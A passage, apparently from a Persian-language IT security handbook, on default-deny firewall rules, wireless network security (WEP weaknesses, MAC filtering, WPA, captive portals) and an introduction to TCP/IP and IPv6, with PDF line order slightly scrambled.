ﺟﻠﻮﻱ ﺗﻤﺎﻡ ﺟﺮﻳﺎﻥ ﺩﺍﺩﺓ ﻭﺭﻭﺩﻱ ﺑﺠﺰ ﭼﻨﺪ ﺍﺳﺘﺜﻨﺎ -ﻣﺜﻞ ﺍﺟﺎﺯﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ HTTPﺑﻪ ﭘﻮﺭﺕ ٨٠ﺑﺮﺍﻱ ﻫﻤﻪ ،ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ •
ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ SSHﺑﻪ ﭘﻮﺭﺕ - ٢٢ﺭﺍ ﺑﮕﻴﺮﺩ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﺁﻧﭽﻪ
ﻻ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺗﻮﺻﻴﻪ ﻣﻲﮔﺮﺩﺩ.
ﻛﻪ ﻣﺠﺎﺯ ﻧﻴﺴﺖ" ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ ،ﻳﻚ ﺍﻟﮕﻮﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺝﺷﻮﻧﺪﺓ HTTPﺑﻪ ﻣﻘﺼﺪ ﻫﺮﻛﺠﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺟﺎﺯﺓ ﺧﺮﻭﺝ ﺩﻫﺪ ،ﺍﻣﺎ ﺍﺗﺼﺎﻻﺕ ﺑﻪ ﺳﻤﺖ ﺩﺭﻭﻥ ﺭﺍ ﺗﻨﻬﺎ ﺍﺯ ﺑﺮﺧﻲ •
ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺧﺎﺹ ﻣﺠﺎﺯ ﺑﺪﺍﻧﺪ.
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻞ ﺩﺭ ﺁﻳﻨﺪﻩ ﺛﺒﺖ ﻛﻨﺪ. •
ﻧﺎﻇﺮ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ،ﻧﻴﺎﺯ ﺑﻪ ﭼﻨﺪ ﻛﺎﻭﺵ ٢٦٥ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ
ﻧﺎﻇﺮﻫﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻛﻪ ﺑﺎ ﭘﻮﻳﺶ ﺑﻪ ﻳﺎﻓﺘﻦ ﻧﻘﺎﻁ ﺣﻤﻠﻪ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺑﺮﺍﻱ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﻭ ﺗﺠﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ.
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ
ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺩﺭ ﺷﺒﻜﻪﺳﺎﺯﻱ -ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺍﻣﺎﻛﻨﻲ ﻛﻪ ﺍﻳﺠﺎﺩ ﺯﻳﺮﺳﺎﺧﺖ ﺷﺒﻜﻪﺍﻱ ﻫﺰﻳﻨﻪﺑﺮ ﻭ ﻳﺎ ﻧﺎﻣﻤﻜﻦ
ﻣﻲﺑﺎﺷﺪ -ﺷﺒﻜﻪﺳﺎﺯﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ .ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻋﻤﻮﻣﹰﺎ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﻫﺎﻱ 802.11ﻣﺆﺳﺴﻪ IEEEﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ،ﻛﻪ ﺷﺎﻣﻞ
802.11a ،802.11bﻭ 802.11gﻣﻲﺷﻮﺩ ٢٦٦.ﺩﺭ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴ ﹺﻢ ﻧﻮﻋﻲ ،ﻭﺳﺎﻳﻠﻲ ﺑﻪ ﻧﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ ٢٦٧ﺑﺮﺍﻱ
ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻳﻚ ﻣﺤﺪﻭﺩﺓ ﻣﺸﺨﺺ )ﻣﺜ ﹰﻼ ﻳﻚ ﻃﺒﻘﻪ ﺍﺯ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ( ﻧﺼﺐ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ
ﻳﻜﺪﻳﮕﺮ ﻣﺘﺼﻞ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻥ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ،ﺩﺭ ﻧﻬﺎﻳﺖ ﺑﺎﻳﺪ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻣﺘﺼﻞ ﮔﺮﺩﻧﺪ.
ﻣﻼﺣﻈﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﺮﭘﺎﻳﻲ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﻣﺤﺮﻣﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ؛ ﻳﻌﻨﻲ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺒﺎﻳﺪ ﻗﺎﺩﺭ
ﺑﻪ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﻨﺪ ،ﻭ ﺍﺯ ﺁﻥ ﮔﺬﺷﺘﻪ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﭙﻴﻮﻧﺪﻧﺪ ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺁﻥ )ﻣﺜﻞ ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ
ﻛﻨﻨﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺷﺒﻜﻪﺳﺎﺯﻱ ﺑﻲﺳﻴﻢ ،ﺳﺎﺑﻘﺔ ﺧﻮﺑﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ .ﺧﺼﻮﺻﹰﺎ ﺷﺒﻜﻪﻫﺎﻱ 802.11bﺍﻛﺜﺮﹰﺍ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺴﻴﺎﺭ
ﻣﺤﺪﻭﺩﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ .ﻫﺮﭼﻨﺪ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺑﻪ ﻧﺎﻡ ﭘﺮﻭﺗﻜﻞ ﻣﻌﺎﺩﻝ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ) ٢٦٨(WEPﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﻄﺢ ﺍﺗﺼﺎﻝ
ﻫﻢﺍﻛﻨﻮﻥ ﮐﺎﺭﺑﺮﺩ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺣﺎﻭﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﻭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﺴﺒﺘﹰﺎ
ﺳﺎﺩﻩﺍﻱ )ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻭ ﻳﻚ ﻛﺎﺭﺕ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ( ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺍﺩﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻛﺸﻒ ﻭ ﺗﻤﺎﻡ
ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺁﺷﻜﺎﺭ ﺳﺎﺯﻧﺪ .ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻣﺜﻞ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ) MACﺩﺍﺩﻥ ﺍﺟﺎﺯﺓ ﻭﺭﻭﺩ ﻭ ﺍﺗﺼﺎﻝ ﺗﻨﻬﺎ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ
ﺑﻲﺳﻴﻤﻲ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺩﺍﺭﻧﺪ( ﻧﻴﺰ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ ،ﭼﺮﺍﻛﻪ MACﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺗﻐﻴﻴﺮ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﻓﻌﺎﻝ
ﻛﺮﺩﻥ ﻫﻤﺔ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﺍﻣﻨﻴﺘﻲ -ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻐﻴﻴﺮ ﻣﻘﺪﺍﺭ ﭘﻴﺶﻓﺮﺽ SSIDﻫﺎ ﻭ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﭘﺨﺶ ﻋﻤﻮﻣﻲ - SSIDﻣﻲﺗﻮﺍﻧﺪ
ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺳﻄﺢ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﻤﺔ ﺁﻧﻬﺎ ﺩﺭﮐﻨﺎﺭ ﻫﻢ ﻧﻴﺰ ﻣﻨﺠﺮ ﺑﻪ ﺍﻳﺠﺎﺩ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﻳﻤﻦ
ﻧﻤﻲﺷﻮﺩ.
ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻗﺪﻳﻤﻲﺗ ﹺﺮ ،802.11bﻣﺤﺮﻣﺎﻧﮕﻲ ﺗﻨﻬﺎ ﺑﺎ ﺍﻟﺰﺍﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻧﺘﻬﺎ ﺑﻪ ﺍﻧﺘﻬﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻻﺕ
)ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ VPNﻳﺎ (SSHﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ captive portalﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ .ﺩﺭ
ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻛﻪ ﺑﻄﻮﺭ ﺍﻳﺪﻩﺁﻝ ﺩﺭ ﻫﻤﺔ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻞ ﻣﻲﻛﻨﺪ( ،ﺗﻤﺎﻡ ﺗﺮﺍﻓﻴﻚ ﺗﺼﺪﻳﻖﻫﻮﻳﺖﻧﺸﺪﻩ ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﻨﺪ ،ﺑﺠﺰ
ﺗﺮﺍﻓﻴﻜﻲ ﻛﻪ ﺑﻪ ﺑﺮﻧﺎﻣﺔ portalﻣﻲﺭﻭﺩ ،ﻭ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻤﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻉ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﺮﺍﻱ ﺩﺍﺩﻥ ﺍﺟﺎﺯﺓ
ﺑﺨﺶ ﭘﻨﺠﻢ
265 Probe
۲۶۶ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺑﻲﺳﻴﻢ ﻣﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﻭ PDAﻫﺎ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ GSMﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺸﻜﻼﺕ 802.11ﮔﺮﻳﺒـﺎﻧﮕﻴﺮ ﺷـﺒﻜﻪﻫـﺎﻱ
GSMﻧﻴﺰ ﻫﺴﺘﻨﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ" :ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ :ﺍﻣﻮﺭ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ" ﺳـﺎﻝ ،۲۰۰۲ﻧﻮﺷـﺘﺔ
Tom Kellermannﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲwww.worldbank1.org/finance :
267 Wireless Access Points
268 Wired Equivalent Protocol
269 Extensible Authentication Protocol
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٩٢
ﺩﺳﺘﺮﺳﻲ ﻫﻮﻳﺖ ﺭﺍ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻭ ﺣﺎﻟﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﻪ "ﺗﺼﺪﻳﻖﺷﺪﻩ" ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ،ﻳﻚ ﻛﻠﻴﺪ WEPﺍﻭﻟﻴﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﻲﻓﺮﺳﺘﺪ ،ﻭ ﺩﺭ ﻃﻮﻝ ﺍﺗﺼﺎﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﻛﻠﻴﺪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺑﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻥ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﻠﻴﺪﻫﺎ ،ﺍﺯ
ﺑﺮﻭﺯ ﺣﻤﻼﺗﻲ ﻛﻪ ﺑﺮ ﮔﺮﻓﺘﻦ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺴﺘﻪ ﺑﺎ ﻛﻠﻴﺪ ﻳﻜﺴﺎﻥ WEPﺗﻜﻴﻪ ﺩﺍﺭﺩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﺷﻮﺩ.
ﺩﺳﺘﺮﺳﻲ ﺣﻔﺎﻇﺖﺷﺪﺓ ٢٧٠(WPA) Wi-Fiﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪﺗﺮﻱ ﺍﺳﺖ ﮐﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ WEPﻭ ﻧﻴﺰ ﻗﺎﺑﻠﻴﺖ ﺗﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺍﺯ ﻃﺮﻳﻖ 802.1xﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺘﺮﻙ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ .ﺍﻳﻦ ﺣﺎﻟﺖ ﺩﺭ ﺍﺻﻞ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺍﺩﺍﺭﺍﺕ
ﻛﻮﭼﻜﻲ ﺍﺳﺖ ﻛﻪ ﻗﺎﺩﺭ ﻧﻴﺴﺘﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ RADIUSﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ 802.1xﻣﺴﺘﻘﺮ
ﻛﻨﻨﺪ .ﻣﺸﺎﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ،ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺤﻴﺢ ﺻﺎﻓﻴﻬﺎﻱ ﺑﺴﺘﻪﺍﻱ ﺩﺭ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ،ﻣﻮﻗﻌﻴﺖ
ﻣﻨﺎﺳﺐ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﻫﻨﺪﺳﺔ ﺷﺒﻜﻪ )ﻛﻪ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺣﺎﻟﺖ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ( ،ﻭ ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﻣﺴﺘﺤﻜﻢﺗﺮ
ﻛﺮﺩﻥ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ .ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺷﺒﻜﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻧﻴﺰ ﻳﻚ ﺍﻗﺪﺍﻡ ﻣﻔﻴﺪ ﺍﺳﺖ.
ﺩﺭ ﭘﺎﻳﺎﻥ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻣﻌﺮﺽ ﭘﺎﺭﺍﺯﻳﺖ ٢٧١ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺟﺎﻕ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻛﻪ ﺩﺭ
ﺩﻳﻮﺍﺭﺓ ﺁﻥ ﻳﻚ ﺷﻜﺎﻑ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻋﻤﻠﻴﺎﺕ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ (802.11) Wi-Fiﺭﺍ ﻣﺨﺘﻞ ﺳﺎﺯﺩ ،ﭼﺮﺍﻛﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻭ Wi-Fiﻫﺮﺩﻭ ﺍﺯ ﺑﺨﺶ ﻳﻜﺴﺎﻧﻲ ﺍﺯ ﻃﻴﻒ 2.4 GHzﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻟﺒﺘﻪ ﭘﺎﺭﺍﺯﻳﺖ ﻣﻨﺠﺮ ﺑﻪ ﺍﻓﺸﺎﻱ
ﺍﻃﻼﻋﺎﺕ ﻧﻤﻲﺷﻮﺩ ،ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺭﺍ ﺩﺭ ﻋﻤﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺳﺎﺯﺩ.
ﺩﻭ ﻛﺘﺎﺏ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﻳﻤﻦ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ "ﺍﻣﻨﻴﺖ "802.11ﻭ "ﺍﻣﻨﻴﺖ ،"RADIUSﻛﻪ ﻫﺮ ﺩﻭ ﺗﻮﺳﻂ
ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﻫﻤﻜﺎﺭﺍﻥ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩﺍﻧﺪ.
ﺷﺒﻜﻪﻫﺎﻱ TCP/IP
ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ) (IPﺑﻪ ﻣﺜﺎﺑﻪ ﭼﺴﺒﻲ ﺍﺳﺖ ﻛﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻮﻳﻦ ﺭﺍ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ IP .ﺭﻭﺵ ﺍﻧﺘﻘﺎﻝ ﭘﻴﺎﻣﻬﺎ ﺍﺯ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻭ ﺩﺭ ﺣﻘﻴﻘﺖ ﻳﻚ "ﺯﺑﺎﻥ ﻣﺸﺘﺮﻙ" ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ
ﺻﺤﺒﺖ ﻛﺮﺩﻥ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ.
ﻧﮕﺎﺭﺵ ﭼﻬﺎﺭﻡ ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ،IPv4 ،ﻛﻪ ﺍﺯ ﺳﺎﻝ ١٩٨٢ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﺍﻣﺮﻭﺯ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ
ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺳﺎﻟﻬﺎﻱ ﺯﻳﺎﺩﻱ ﭘﺲ ﺍﺯ ﺍﻳﻦ ﻧﻴﺰ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺑﻮﺩ IPv5 .ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺁﺯﻣﺎﻳﺸﻲ ﺑﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻛﺎﺭﺑﺮﺩ
ﻲ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﻭ ﻭﺳﻴﻊ ﭘﻴﺪﺍ ﻧﻜﺮﺩ ،ﻭ IPv6ﺟﺪﻳﺪﺗﺮﻳﻦ ﻧﮕﺎﺭﺵ ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺖ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﻣﺰﺍﻳﺎﻳﻲ ﭼﻮﻥ ﻓﻀﺎﻱ ﺁﺩﺭﺱﺩﻫ ﹺ
ﻗﺎﺑﻠﻴﺖ ﺫﺍﺗﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﺯ ﺳﺎﻝ ٢٠٠٣ﭘﺮﻭﺗﮑﻞ IPv6ﺑﻄﻮﺭ ﺁﺯﻣﺎﻳﺸﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺯﻳﺎﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻭ ﺑﺘﺪﺭﻳﺞ ﻧﻴﺰ
ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻣﻲﺷﻮﺩ.
